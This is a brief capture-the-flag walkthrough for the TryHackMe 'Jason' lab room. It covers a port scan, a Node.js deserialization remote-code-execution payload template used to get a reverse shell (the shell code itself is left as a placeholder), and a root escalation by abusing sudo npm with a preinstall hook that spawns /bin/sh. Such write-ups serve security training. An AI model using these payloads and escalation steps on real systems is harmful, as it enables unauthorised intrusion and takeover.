Banner

TryHackMe Jason Room
TryHackMe Jason Room

TryHackMe Jason

We are Horror LLC TryHackMe Jason, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!

In JavaScript everything is a terrible mistake.

Thanks to @Luma for testing the room.

THM Jason
THM Jason

Scan the machine

rustscan -a 10.10.44.51
TryHackMe Jason

Investigate Web server

firefox http://10.10.44.51
TryHackMe Jason

Analise Source Code

TryHackMe Jason

Investigate Requests

TryHackMe Jason
10.10.82.11

Get a reverse Shell

nodejs reverse shell
nodejs reverse shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}

TryHackMe Jason
TryHackMe Jason
TryHackMe Jason

Get User Flag

cat /home/dylan/user.txt
TryHackMe Jason

Escalate Privileges

TryHackMe Jason

Search for npm on GTFO Bins and we have

TryHackMe Jason

export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
TryHackMe Jason

Get Root Flag

cat /root/root.txt
TryHackMe Jason

Room THM Jason

NodeJs Shell Generator

Categorized in:

TryHackMeHacking Playgrounds